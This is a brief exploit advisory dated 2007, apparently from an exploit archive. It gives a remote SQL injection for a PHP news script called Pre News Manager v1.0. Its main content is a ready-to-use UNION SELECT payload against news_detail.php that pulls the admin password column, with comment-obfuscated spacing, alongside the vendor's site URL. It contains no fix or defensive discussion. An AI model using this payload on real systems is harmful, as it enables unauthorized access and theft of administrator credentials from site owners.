prenews-sql.txt
Posted on 04 May 2007
============================================== Pre News Manager v1.0 Remote SQL Injection ============================================== Found: Cyber-Security.org ============================================== Script site: http://www.preproject.com/news.asp ============================================== Exploit: news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/* ============================================== Example: http://www.preproject.com/news%20manager/ ==============================================